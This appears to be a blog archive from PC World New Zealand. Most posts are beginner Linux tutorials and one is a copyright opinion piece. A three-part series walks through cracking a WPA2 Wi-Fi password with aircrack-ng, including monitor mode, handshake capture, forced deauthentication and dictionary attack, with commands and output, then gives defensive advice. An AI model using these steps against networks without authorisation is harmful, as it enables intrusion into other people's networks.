New Zealand PC World Magazine > Blogs

January 30, 2012

Beginning Linux : Part 4 - Exploring the Unity interface

Ubuntu's Unity interface is a step away from traditional graphical user interfaces. The intention is to make it the basis of a standard interface for everything from PCs to tablets to phones, and it's implementation has been somewhat controversial. It's predicated on two main ideas; that most users only ever use a handful of applications, and that people prefer to search for things by typing -- as they do on the web -- rather than going through going through arcane menus and clicking on drop-downs. I take issue with the second of those, but before abandoning the interface entirely -- this is Linux, after all! -- it's worth exploring Unity to see what it has to offer.

Unity vs Unity 2D

There are two distinct forms of Unity -- Unity and Unity 2D -- and they look almost identical, but they are built very differently. The default, Unity, (sometimes called "Unity 3D"), uses the Compiz window manager and your fancy 3D graphics card to add all sorts of eye candy like translucency and cool 3D graphical effects. It's really designed for modern hardware. Older gear will perform better with Unity 2D.

The easiest way to tell what you're running is to move your cursor over the Dash button:

But that may change in future versions. A more reliable way is to type this command in terminal window:

echo $DESKTOP_SESSION

A return value of "ubuntu" means Unity (3D), while "ubuntu-2d" means Unity 2D.

You can select which version to run at login. Just click the gear icon before you enter your password.

Whatever you select will automatically become the default, so there's no need to repeat this process every login.

Unity's Launcher

The Launcher -- that icon bar on the left -- is Unity's most obvious feature. Click on a button and the application will start. Running apps get a little arrow head on the left, while the one currently in the foreground also scores an arrow on the right:

Left-clicking a Launcher button will bring an already open application to the foreground, but what if you want to open a separate copy? Easy, just click it with the middle button of your mouse instead. (If you only have a two-button mouse, right-click the Launcher button and choose New.)

Unity will track each separate opening of the same application by adding a check mark to the left ...

... so here I have three instances of Terminal running

The exception to all of the above is the Dash button at the top of the Launcher. This is the place you search for and start apps not already on the Launcher. Once an app is started, if you want to keep it there for easy access in future, just right-click it and tick Keep in Launcher:

To remove an item from the Launcher, right-click it and untick Keep in Launcher.

To re-order items, simply left-click the icon and drag it to where you want.

As the Launcher fills, items on the bottom will stack. Just move the cursor over them and they'll unpack.

With items unstacked, use the mouse's scroll wheel to move through the list, or left-click and drag to move quickly up and down the list.

Unity has a number of nifty screen-space saving features like hide-away scroll bars that only appear if you need them.

One initially confusing aspect for many new users is the apparent absence of menus. (This is even more disturbing if you maximise an app because the Exit, Maximise and Window buttons disappear too!) To find them again, just move the cursor to the Status Bar at the top of the screen ...

... or press the <Alt> key.

Unity has a heap of keyboard shortcuts built-in. Here are some of the most useful:
(Note: The Meta key is the one with the (shudder) Windows logo on it.)

Meta	Tap to open the Dash. Tap to close it again.
Meta	Hold it down to reveal the Launcher and number launchable applications. (See below.)
Meta + 1 thru to Meta + 0	Start Launcher item number n or switch to it if it's already running. (Hold down Shift to open a new window.)
Meta + A	Open the Application selector.
Meta + F	Open Files and Folders.
Meta + T	Open Trash.
Ctrl + Alt + T	Open a Terminal window.
Alt	Reveal the Application menu.
Alt + Tab	Switch between windows.

Hidden Linuxy Goodness

There are a few other things you may not be aware of -- what I like to call hidden Linuxy goodness. For example, you actually have four separate workspaces available by default. That means, for example, you could do word processing in workspace #1, email and web browsing in space #2, programming in space #3, etc. and simply switch between them.

This is where the next set of shortcut keys kick in:

Ctrl + Alt + Arrow keys	Shift between workspaces
Meta + S	Activate the workspace switcher, zooming out on all of them.
Meta + W	Show all windows from all workspaces.
Ctrl + Alt + Shift + Arrow keys	Move the current window to a different workspace.

Another way of performing that last command is to right-click in an application's Title Bar and choose Move to Another Workspace.

Perhaps you're now thinking that Unity's not so scary after all. Personally, I rather like it. But if you'd like to try something more conventional, tune in next time. Complete reconfiguration is only a few commands away ...

Posted by Geoff Palmer at 11:04 PM | Comments ( 0 )

January 20, 2012

Beginning Linux : Part 3 - Adding hidden extras

Now you've got Ubuntu installed and running, you'll have probably noticed there are one or two things missing. Things like MP3 playback and decoding, support for certain audio formats, Microsoft fonts, Java runtime playback, Adobe Flash, and the ability to play (and rip) DVDs.

The reason this stuff's missed out from the default install is that it's either proprietary -- meaning the source code is controlled by a third party and you have to agree to their terms and conditions in order to use it -- or it's subject to copyright restrictions, or, in some countries (notably the US), there may be legal issues surrounding its use. (You can find more about this stuff here.)

Some users have philosophical reasons for not using closed-source software too -- but many don't, and if you're one of them, read on ...

Getting extras

We need to install more software, and to do so you'll want to start Ubuntu's Software Centre. There are two ways to do this;
The graphical way is as follows:

Click the Dashboard Home button (on the top left),

choose More Apps,

select System,

click on Installed (See more results),

then scroll down and click Ubuntu Software.

Alternatively, you can hit <Alt + F2> to open the Run a command dialog box and start typing "software". Various options will filter out underneath, and you can click on Software Centre from there.

Once Ubuntu Software Centre is running, type "restricted" in the search pane,

select Ubuntu Restricted Extras and click Install.

You may get a dialog box warning that a couple of existing packages will need to be removed. That's fine. They'll be replaced with different versions. Just click Install Anyway.

Of course, Linux doesn't allow any old user to install any old software. You'll have to supply your root ("system admin") password first.

And now you'll get a blast from the past: license agreements. Remember them? Trust me, they're a rarity in the free software world!

Installation progress is shown in a little bar above the Install button.

And that's it. Your first program (actually, multiple-program) installation. Pretty easy, eh? (Yes, all new installations are that simple.)

The CSS secret

But we're not quite done yet. While you can now play unencrypted DVDs, you still won't be able to play most commercial ones due to their use of the Content Scramble System (or CSS), a proprietary encryption system that was cracked over a decade ago. In some countries it's still not legal to possess a copy of DeCSS (the unencryption program), and that's why it has to be installed separately.

To do that, we're going to look at another way to install software: directly from the command line.

Click the Dash Home button and type "terminal" in the search line. Click the Terminal icon and you're ready.

The necessary library (libdvdread4) should already have been installed as part of the Restricted Extras package, but it does no harm to check. Type in this command and press <Enter>:

sudo apt-get install libdvdread4

You'll be asked to supply the root password, and you should then get a message saying that it's already been installed. If you don't, go ahead and install it.

Now you need to install the CSS bit. You do so with this command:

sudo /usr/share/doc/libdvdread4/install-css.sh

Done! Close the terminal window -- <Ctrl + D> is a shortcut key for this -- and enjoy your DVDs.

If you still have problems, check out Playing DVDs on the Ubuntu site.

Posted by Geoff Palmer at 4:44 PM | Comments ( 0 )

January 12, 2012

Beginning Linux : Part 2 - Installation step-by-step

Linux downloads typically come as ISO images that will burn directly to a CD. You can also install them on a USB stick and boot them from there. But how do you get them to actually boot?

Most PCs are configured to boot from a removable disk first, a CD if no removable disk is found, then a hard disk drive if neither of the others are present, but you can't guarantee that! If your machine goes straight to hard disk, you'll need to change your BIOS settings, which can be accessed by pressing F2, F12, Delete, or ESC at boot. (The appropriate key differs with different BIOS makers.)

Note that you may need to change two settings in some BIOSes. Adding a USB stick to my American Megatrends BIOSed machines requires checking the Boot Device Priority and setting the Hard Disk Drives so that the first drive is the USB, not the hard disk.

And that's about as technical as it gets. With the boot disk booting, you're on your way. The rest is really straightforward.

(If you still have boot problems -- especially with older CD-ROM hardware -- check this link out.)

Installation: A graphical walk-through

I'm guessing you can figure out what to click here ...

You have two additional options here: if you're connected to the net and have a reasonably fast broadband connection, tick Download updates while installing, but note that the installation process may take quite a bit longer. (You'll be presented with automatic updates once you're up and running, so adding them now isn't essential -- especially as you're probably keen to Ubuntu going!)

The second option to Install third party software should be ticked. I'm not sure what hardware's on your machine, but you probably want it all to work!

Unless you're an advanced user or really know what you're doing with hard disk partitions, choose Install Ubuntu alongside your existing operating system(s).

If you're connected to the net, Ubuntu will take a stab at where you are. If it gets it wrong, just click the appropriate time zone.

Local (New Zealand) keyboard layouts are typically English (US) / English (US), but Linux can accommodate everyone.

Now for the tricky stuff: who are you? I'll leave you to figure that out.

There are two other options to consider: Log in automatically is fine if you're the only user of the machine. Personally, I prefer the default: Require my password to log in. It's just more secure.

It depends on your hardware, but a typical Linux installation (excluding automatic updates) will take 10-20 minutes. In the meantime, browse some slides of what you new OS can do, or just go and make a coffee.

That's it. Ready for a reboot.

At boot time, you'll now get a menu allowing you to choose which operating system to start. By default it's set to Ubuntu, and if you do nothing for 10 seconds Ubuntu will start automatically. But of course, this is Linux. All this is configurable -- and I'll show you how in coming blogs.

In the meantime, check out Ubuntu and the new Unity desktop.

Next time, we'll have a quick look at what's there (and what's missing). And how to add the missing stuff!

Posted by Geoff Palmer at 3:25 PM | Comments ( 0 )

December 8, 2011

Beginning Linux - Part 1 - Getting into Linux

In this month's print edition of PC World, reader David Crickmer mentions he'd like to see a series about getting started in Linux. Since this blog largely revolves around the portly penguin, I thought I'd give it a go ...

Which Linux?

The first decision -- which "brand" of Linux to opt for -- can seem the most daunting. Since Linux is free and open, anyone can create their own unique release. Linux versions are known as distributions, and the website DistroWatch.com lists more than 4,000 of 'em! You'll find Linuxes targeted at specific hardware from the latest netbooks to ancient PCs. There are Linuxes designed for specific purposes such as computer forensics or disk partitioning; Linuxes to run web servers and supercomputers; Linuxes for scientists, mathematicians and astronomers; Linuxes to build media players or backup servers; Linuxes for national, religious and political groups; and even Linuxes that mimic the look and feel of other well-known operating systems.
	The key point to remember is that all versions of Linux are based on the Unix operating system. I won't say that once you've mastered one, you've mastered them all, but it's certainly the case that once you're familiar with the way Linux works, you won't be daunted by any of those 4,000+ distros! They're all free, and if you don't like one, it's easy to replace it with another.
This astonishing Linux time-line charts the linkages and relation- ships between many well-known distros.

Which Desktop?

	There are three main Linux desktops -- the desktop being the Graphical User Interface (or GUI) that forms the basis of your working environment. Gnome, (aficionados pronounce it "g-nome" as opposed to "nome"), KDE (short for the K Desktop Environment), and Unity (recently released by Ubuntu). All have their particular strengths, but don't get too hung up on which one to pick at this stage. While some distros are desktop-specific, most allow you to install alternatives so you can try them all and see which you prefer -- which is exactly what we'll be doing a bit later on. (One of the neat things about Linux is that you don't need to reboot to change desktops. Just log out and log in again!)
Gnome 3

KDE 4.7

Unity

Getting Hold of Linux

OK, so where do you get it?

Frankly, Linux is everywhere, and one of the easiest sources is the good old magazine cover disc. (This month's print edition of PC World features no less than three complete distributions!)

The other alternative is to download and burn your own CD or write it to a USB stick. A typical distro is around 600-650MB so you'll need a broadband account or a lot of patience. We're going to focus on Ubuntu for this series, and you'll find it's download alternatives here.

One of the reasons I recommend Ubuntu is that it's only tremendously popular and has great user support, but it also has three simple installation alternatives; you can do a straight download and install, run it from a CD or USB drive, or even install and run it under Windows.

Why not run Linux from a CD or DVD?
In a word, performance. CD/DVD-ROM drives are utter slugs compared to hard disc drives. If you want to give Linux a reasonable run, use a USB-2 or USB-3 drive, but for my money, HDD is best!

I'm not going to give you chapter and verse on download and installation, mainly because Ubuntu do it so well! Really, check out their website. Simply select your preferred alternative and follow the instructions.

If you're still a little nervous, simply download and burn a copy to CD and next time I'll walk you through the installation process, screen-by-screen. I'll also show you how to default to your preferred operating system on boot, and -- heaven forbid -- deinstall Linux if you hate it.

Posted by Geoff Palmer at 5:54 PM | Comments ( 0 )

November 20, 2011

Hidden Linux : Divide and Conky

Conky is, in it's own words, "a free, light-weight system monitor ... that displays any information on your desktop." Sounds pretty dull, right? Well check it out ...




Click on the graphics above to link to details of how they were done!

Installing Conky's a doddle: just use your package manager. For Ubuntu/Debian users, that means simply typing

sudo apt-get install conky

on the command line.

Once it's installed, you'll need a .conkyrc script in your /home/username folder. Here's a basic one to get you started ...

# Use Xft? # Use Xft?
use_xft yes
xftfont OFL Sorts Mill Goudy:size=8
xftalpha 0.8
text_buffer_size 2048

# This is the number of times Conky will update before quitting.
# Set to zero to run forever.
total_run_times 0

# Update interval in seconds
update_interval 1

# Create own window instead of using desktop (required in nautilus)
own_window yes
own_window_type override
own_window_class conky
own_window_type panel
background no
own_window_type normal
own_window_transparent yes
own_window_argb_visual yes
own_window_hints undecorated,below,sticky,skip_taskbar,skip_pager
own_window_title conky-semi
own_window_class conky-semi

alignment top_right
border_width 1
cpu_avg_samples 2
default_color white
default_outline_color white
default_shade_color white
draw_borders no
draw_graph_borders yes
draw_outline no
draw_shades no
use_xft yes
xftfont DejaVu Sans Mono:size=8
gap_x 10
gap_y 10
minimum_size 5 5
net_avg_samples 2
no_buffers yes
out_to_console no
out_to_stderr no
extra_newline no
own_window yes
own_window_class Conky
own_window_type desktop
stippled_borders 0

uppercase no
use_spacer none
show_graph_scale no
show_graph_range no

# Use double buffering (reduces flicker, may not work for everyone)
double_buffer yes

TEXT
${color goldenrod}Hostname: ${color} $nodename
${color goldenrod}Linux Kernel: ${color} $kernel
${color goldenrod}CPU Details: ${color} $machine, $freq(MHz)
$color$stippled_hr
${color}CPU History: ${color darkgreen}${cpugraph 20,0 0000ff 00ff00}
${color}CPU Usage:${color magenta2} $cpu% ${cpubar 6,0}

${color}RAM Usage:${color green} $mem ($memperc%) ${membar 6,0}
${color}Available RAM:${color green} $memmax
${color}Swap Usage:${color yellow} $swap/$swapmax - $swapperc% ${swapbar 4}

${color grey}Processes:$color $processes ${color grey}Running:$color $running_processes
$color$stippled_hr
${color}File systems:
/ $color${fs_used /}/${fs_size /} ${fs_bar 6 /}
${color grey} Used: $color$fs_used_perc% ${color grey}Free: $color$fs_free_perc%
${color}Networking:
${color grey}Ethernet: Up:$color ${upspeed eth0} ${color grey} Down:$color ${downspeed eth0}
${color grey}Wireless: Up:$color ${upspeed wlan0} ${color grey} Down:$color ${downspeed wlan0}
$color$stippled_hr
$alignc${color}Processes:$color $processes ${color grey}Running:$color $running_processes
$alignc${color}(top 5 sorted by CPU usage)
${color goldenrod} NAME PID CPU% MEM%
${color} ${top name 1} ${top pid 1} ${top cpu 1} ${top mem 1}
${color} ${top name 2} ${top pid 2} ${top cpu 2} ${top mem 2}
${color} ${top name 3} ${top pid 3} ${top cpu 3} ${top mem 3}
${color} ${top name 4} ${top pid 4} ${top cpu 4} ${top mem 4}
${color} ${top name 5} ${top pid 5} ${top cpu 5} ${top mem 5}

$alignc${color}(top 5 sorted by MEM usage)
${color goldenrod} NAME PID CPU% MEM%
${color} ${top_mem name 1} ${top_mem pid 1} ${top_mem cpu 1} ${top_mem mem 1}
${color} ${top_mem name 2} ${top_mem pid 2} ${top_mem cpu 2} ${top_mem mem 2}
${color} ${top_mem name 3} ${top_mem pid 3} ${top_mem cpu 3} ${top_mem mem 3}
${color} ${top_mem name 4} ${top_mem pid 4} ${top_mem cpu 4} ${top_mem mem 4}
${color} ${top_mem name 5} ${top_mem pid 5} ${top_mem cpu 5} ${top_mem mem 5}
$color$stippled_hr
$alignc${color}System Uptime:${color DarkOrange1} $uptime

Now all you need do is kick off Conky by hitting Alt+F2 and entering conky, or type this on the command line:

conky &

(The ampersand (&) will make it run as a background process.)

Now here's the fun part. Open .conkyrc in a regular text editor and make changes to it. Save those changes, and your display should be updated. Make some more changes, save them, and again you'll see the changes immediately reflected in Conky -- well, within a second anyway. That's what that line;

update_interval 1

is all about. In practice, once you're happy with your setup, you might want to reduce it to only update every five or ten seconds.

And what if the Conky display disappears altogether? Use Undo to undo whatever you last changed in .conkyrc and re-save it or, if it's totally screwed, use Alt+F2 or the command line to enter killall conky and restart from scratch.

For (much) more documentation on settings and features, type

man conky

man conky > conky.txt

to copy the manual pages to a file called conky.txt, from whence you can study them at leisure!

Posted by Geoff Palmer at 9:16 PM | Comments ( 1 )

November 2, 2011

Infringement notices on the way

Here they come. The first copyright infringement notices under the two-month old Copyright Amendment Act are currently winging their way to unlucky downloaders. Telecom have fired off 42, Orcon eight and TelstraClear -- whose Chief Executive Allan Freeth at least spoke out against this ridiculous law -- are in the process of validating "a few dozen allegations".

So far, all appear to involve music downloads, with 40 of the 50 sent to Telecom and Orcon involving tracks by Rhianna, and another six for downloaders of Lady Gaga. Great to see the Recording Industry Association of New Zealand -- which issued the notices -- looking after New Zealand artists ...

Let me know if you get one of these notices. I'm very interested in seeing how this process works -- particularly if you challenge it.

Footnote
Here's the concluding paragraphs of Freeth's opinion piece "What's wrong with copyright":

Instead of bringing in a law that we believe will not and cannot work, our government should be breaking monopolies, allowing personal choice and letting New Zealanders experience information and entertainment when the rest of the world does.

Instead, it has chosen to introduce a law that could turn ordinary Kiwis into law-breakers.

Posted by Geoff Palmer at 4:31 PM | Comments ( 1 )

October 27, 2011

Hidden Linux : Recomposing Composers

I was recently faced with providing foreign language accent characters in Linux. Most word processors allow you to do this graphically -- via the Insert / Special Characters function in LibreOffice or OpenOffice, for example -- but this soon gets tedious for anything but the occasional insert. Doing it straight from the keyboard would be considerably quicker...

There are a number of ways to achieve this in Linux. Here's what I reckon's the easiest.

Open a console session and type:

setxkbmap -option compose:ralt

And that's it! What you've done is assign a special Linux key called <compose> to the right-hand ALT key -- that's the one to the right of the Spacebar. (You could of course assign it to any key you like, but personally I never use "ralt".)

Now, hold down the <compose> key and type <`> followed by <e> and you get an accented è (that's the grave accent), while <compose> + <'> + <e> yields é (with an accute accent).

Note that you can use these keys in any application. And that's just the beginning!

Using <compose> you can generate hundreds of different symbols. To get an idea of the possibilities, take a look at the file /usr/share/X11/locale/en_US.UTF-8/Compose.

Here's just a few of the characters you can create straight from the keyboard. (I've rendered them in a large font so they display better.)

   ÷   ©   ®
   ô   ø   µ
   å   ♥   ¶
   £   €   ¥
   ₨   ß   ç
   ň   ŋ   ƶ
   Ã   ±   ☭

And here are the key combinations I used to create them:

<compose> + <:> + <->
<compose> + <o> + <c>
<compose> + <o> + <r>

<compose> + <^> + <o>
<compose> + </> + <o>
<compose> + <m> + <u>

<compose> + <o> + <a>
<compose> + <?> + <!>
<compose> + <<> + <3>

<compose> + <P> + <P>
<compose> + <l> + <->
<compose> + <e> + <=>

<compose> + <y> + <=>
<compose> + <R> + <s>
<compose> + <s> + <s>

<compose> + <,> + <c>
<compose> + <c> + <n>
<compose> + <n> + <g>

<compose> + </> + <z>
<compose> + <_> + <A>
<compose> + <+> + <->
<compose> + <C> + <C> + <C> + <P>

(And in case you're wondering about this column's title, it's a subtle homage to a certain Monty Python classic...)

Posted by Geoff Palmer at 3:08 AM | Comments ( 0 )

October 17, 2011

Cracking WPA wireless networks

Part III: Securing Your Wireless Network

Wireless networks are wonderfully convenient but, as we've seen, they're also vulnerable to being hacked. Here's how to make it hard for hackers!

Essential Measures

1. Use a proper password
What makes a good password? Anything that's not in a dictionary for a start! If you want to use something memorable, think passphrases rather than passwords. "2 bee 0r NoT two-B" is vastly more secure than "To be or not to be", but for real security you can't beat long strings of properly randomised junk. How about

bT6i3W429TQRxnefaD1xtZc3b6kgit2eMbk52S0ndK1Km5upS2AI9iakyTZIvqt

or

<CL$8L=noSj+^1)5<4LTaB7#R%PHH2-204V^_fj.@t:%kpsO0p,vJOS8<-qEOm^

Now they're what I call passwords! Both come from Steve Gibson's Perfect Passwords generator. You don't have to use the whole string. Just the first 10-12 characters would do. If you do use the whole string, you'll need to save it on a USB stick which makes it a little less convenience, but no one's ever likely to crack your network.

2. Change the default password
Don't let a hacker reconfigure your hardware! Your wireless router will come with a default password. Change it! There are plenty of lists around (like this one) containing default logins and passwords.

3. Enable encryption
Without encryption, anyone can capture your wireless traffic! Use WPA2 in preference to WPA. Don't ever use WEP, it can be cracked in minutes.

4. Update your firmware
Things change, new vulnerabilities are discovered daily. Check your router's running the latest firmware update.

5. Use HTTPS for management
If you manage your router wirelessly, do so via (encrypted) HTTPS rather than regular HTTP. With the latter, your router's login name and password will be broadcast in clear text.

Useful Measures

6. Disable SSID
Disabling the SSID (Service Set Identifier) will essentially hide your network from casual passers-by. Experienced hackers will still easily detect it, but it requires a little extra work and suggests its owner has a little extra savvy, so they may go for an easier target.

7. Turn on logging
Router logs are often disabled by default. Turn them on. Some routers will even email you of suspicious activity. Invaluable!

8. Switch it off!
If you're going away for a while, turn off your router -- or at least the switch off Wi-Fi. If it ain't broadcasting, it can't be hacked!

Not So Useful Stuff

9. Filter MAC addresses
Every piece of networked equipment has a unique Media Access Control (MAC) address, and at first it would seem to be a good idea to only allow access to particular devices. But the internal tables are a pain to maintain -- you'll have to determine and add the MAC address of every new piece of equipment you connect -- and they're trivially easy to spoof anyway, so Not So Useful.

10. Disable DHCP
Again, I put this in the Not So Useful category merely because it's a pain to maintain. With
Dynamic Host Control Protocol (DHCP) enabled, new devices are automatically assigned IP addresses. With it disabled, they have to be assigned manually. For most casual users that's just a hassle.

Posted by Geoff Palmer at 6:04 PM | Comments ( 0 )

October 5, 2011

Cracking WPA wireless networks

Part II: The crack

Having assembled the tools, it's time to get to cracking. Literally!

Note: The network I cracked belonged to a friend. I did so with his permission, purely as a security exercise. Using these tools for any other purpose is probably illegal!

Also note that in the examples that follow I've randomly altered network names and MAC addresses.

(I used the Slitaz Live Aircrack-ng Distribution on a USB stick for this attack. It's Linux, of course, so if you're running from Windows, the command syntax may be slightly different.)

1. Start monitor mode
Aircrack-ng is a suite of command-line tools, so open up a console window.

The first step is the critical one. You need to turn your wirelss card into monitor mode:

airmon-ng start wlan0

Here's what that yielded on my laptop:

Interface       Chipset          Driver

wlan1           Broadcom         b43 - [phy0]
wlan0           Realtek RTL8187L rtl8187 - [phy1]
                                 (monitor mode enabled on mon0)

Success! But only on the USB wireless card. The laptop's built-in Broadcom card may work with a driver, but that could require a lot more work.

2. Scan for targets
Okay, let's see what networks are out there that we can monitor ...

airodump-ng mon0

Airodump-ng is a wireless packet capture tool that details all the access points and clients within range.

BSSID              PWR Beacons    #Data, #/s CH MB   ENC CIPHER AUTH ESSID

00:16:50:59:52:9C -50       63        1    0   6 54e WPA TKIP   PSK Scuba
00:22:75:31:11:5A -51       32        3    0   1 54e WPA2 CCMP   PSK MyNetwork
00:12:34:56:98:AB -53       47        2    0   3 54e. WPA2 CCMP   PSK Target_Net
00:11:95:DD:8D:99 -60       16        2    0   1 54   WEP WEP         Private Network
00:22:74:52:86:3F -61       28       16    0   7 54e WPA2 CCMP   PSK Belkin_N_Wireless_02843F
00:02:63:50:20:22 -61       30       43    0   9 11 . OPN              OpenNet

BSSID              STATION            PWR   Rate    Lost Packets Probes

00:12:34:56:98:AB 00:11:EF:8B:62:77 -39    0 -36e     0        6 Target_Net

Hit Ctrl+C to stop the capture and note the target's Channel number and BSSID for input into the next step. (Note that I'm targeting a WPA2 network. That WEP would just be too easy!)

3. Begin the capture
We now want to capture just the data going to a particular target. We do so using the following syntax:

airodump-ng -c (channel) -w (name of the capture file) --bssid (bssid) mon0

So targeting Target_Net (above) would give us ...

airodump-ng -c 3 -w Test_Data --bssid 00:12:34:56:98:AB mon0

CH 3 ][ Elapsed: 4 mins ][ 2011-10-04 21:42 ]
BSSID              PWR RXQ Beacons    #Data, #/s CH MB   ENC CIPHER AUTH ESSID
00:12:34:56:98:AB -51 64     1746     9642    0   3 54e. WPA2 CCMP   PSK Target_Net
BSSID              STATION            PWR   Rate    Lost Packets Probes
00:12:34:56:98:AB 00:11:EF:8B:62:77 -38   24e-24e   115     9701 Target_Net

Now we can simply wait for a WPA handshake to occur, or we can try and push things along.

4. (Optional) Forcing a handshake
Open a new console window while the first continues running and use aireplay-ng to inject packets into the network to de-authenticate the client. When you do so, the client will re-authenticate via a WPA handshake, and that's exactly what we want!

aireplay-ng -0 3 -a 00:12:34:56:98:AB mon0

There are tons of options with aireplay-ng, but -0 3 (send three de-authentications) worked for me ...

21:43:34 Waiting for beacon frame (BSSID: 00:12:34:56:98:AB) on channel 3
NB: this attack is more effective when targeting
a connected wireless client (-c <client's mac>).
21:43:34 Sending DeAuth to broadcast -- BSSID: [00:12:34:56:98:AB]
21:43:35 Sending DeAuth to broadcast -- BSSID: [00:12:34:56:98:AB]
21:43:35 Sending DeAuth to broadcast -- BSSID: [00:12:34:56:98:AB]

How do you know if it worked? Check the top right-hand corner of the first console and you should see confirmation.

CH 3 ][ Elapsed: 5 mins ][ 2011-10-04 21:43 ][ WPA handshake: 00:12:34:56:98:AB
BSSID              PWR RXQ Beacons    #Data, #/s CH MB   ENC CIPHER AUTH ESSID
00:12:34:56:98:AB -51 64     1746     9642    0   3 54e. WPA2 CCMP   PSK Target_Net
BSSID              STATION            PWR   Rate    Lost Packets Probes
00:12:34:56:98:AB 00:11:EF:8B:62:77 -38   24e-24e   115     9701 Target_Net

5. Apply a little brute force
We have all the data we need, now it's just a matter of (hopefully) cracking the password. Locate the file where you saved the data in Step 3, the password wordlist you downloaded last time, and run them through aircrack-ng. The format is;

aircrack-ng -w(dictionary file) (data file)

You'll see that Step 3's saved several files with different extensions. The one aircrack-ng needs is the .cap file, so in my case I run ...

aircrack-ng -w wordlist.txt Test_Data.cap

Now it's just a matter of waiting while aircrack-ng tries the possible password combinations.

                                 Aircrack-ng 1.1 r1904

                   [00:32:51] 850148 keys tested (455.42 k/s)

                           KEY FOUND! [ swedishchef ]

      Master Key     : 80 FD 4C 4D 72 34 5F 08 83 67 A0 E5 D3 73 06 EB
                       6B 9F D6 2D AA E4 EC C2 24 7D F7 D3 EF A7 6E FE

      Transient Key : 97 13 7B FF DF 0A 29 07 85 3A 0F FA FC 4D 62 92
                       14 F8 33 9B 67 01 08 B3 DE 21 49 B9 53 F7 D9 FF
                       18 9A BA 40 B6 A3 2D 92 CB 27 A7 7A EE F6 7A F0
                       21 52 8E 50 00 14 35 F8 4A 0A 5D 49 BC 15 E2 08

      EAPOL HMAC     : 85 31 D0 6F 21 8F D7 7A D9 FA EF F1 66 4B 5A B2

Bingo! And there's our password. Simple as that!

So what can you do to maximise your security and prevent hacks like this? Read Part III, coming soon...!

Posted by Geoff Palmer at 11:01 PM | Comments ( 0 )

October 2, 2011

Cracking WPA wireless networks

Part I: Assembling the tools

Wireless networks are everywhere, but many are insecure. The older WEP protocol has been thoroughly compromised and most users rely on the more robust WPA protocol. But a chain is only as strong as its weakest link, and that weak link is invariably the password used to secure the network. So I decided to try a little wi-fi cracking to see how easy it is ...

Wow! In little over an hour I went from neophyte to bona fide cracker, my first pwned network under my belt. It's disturbingly simple. Here's how I did it ...

Note: The network I cracked belonged to a friend. I did so with his permission, purely as a security exercise. Using these tools for any other purpose is probably illegal!

The basic toolset consists of three parts:

aircrack-ng
a wordlist
a suitable wireless receiver

First, the easy stuff ...

The Software
Aircrack-ng isn't a single program, it's a suite of more than a dozen tools for auditing wireless networks. It runs under Linux and Windows, there's a version for VMWare virtual machines, and even a proof-of-concept version for the iPhone.

Linux users can install the whole suite by simply selecting "aircrack-ng" from their distribution's repository. Other users can download the latest from aircrack-ng's site.

Another alternative is to download the ready-built Slitaz Live Aircrack-ng Distribution. It's a bootable Linux CD with aircrack-ng built in.

The other piece of software you'll need is a password wordlist. The way WPA cracking works is to take one word at a time from the wordlist and try it in various common combinations to see if its encoded form matches what's been captured. If this sounds slow and laborious, it is, but it's the sort of thing that computers excel at. Depending on your processor, it's possible to test many thousands of combinations per second.

Googling for "wordlists" will turn up dozens, in many different languages. I settled for the English dictionary from this collection. It contains a modest 300,000 possible passwords in a 1MB file. Obviously, the bigger the wordlist, the more likely you are to crack the password. If you're really keen, there's the Openwall Wordlist Collection, a 33GB whopper that costs around US$30.

The Hardware
To begin cracking you'll also need a suitable network card, one that can be flipped into what's known as "monitor mode". The aircrack-ng website has a useful tutorial here: Is My Wireless Card Compatible?

If you do have a compatible card, use their Compatibilty Drivers to see if aircrack-ng will work okay with it, and what drivers you'll need, if any.

If all that sounds a bit daunting, you can simply buy a suitable USB network card and bypass the one in your PC. What is the Best Wirelss Card to Buy? will help. I picked up a USB-based RTL8187L device for a little over $20.

We're now ready for the fun stuff. Part II coming soon ...!

Posted by Geoff Palmer at 10:02 AM | Comments ( 0 )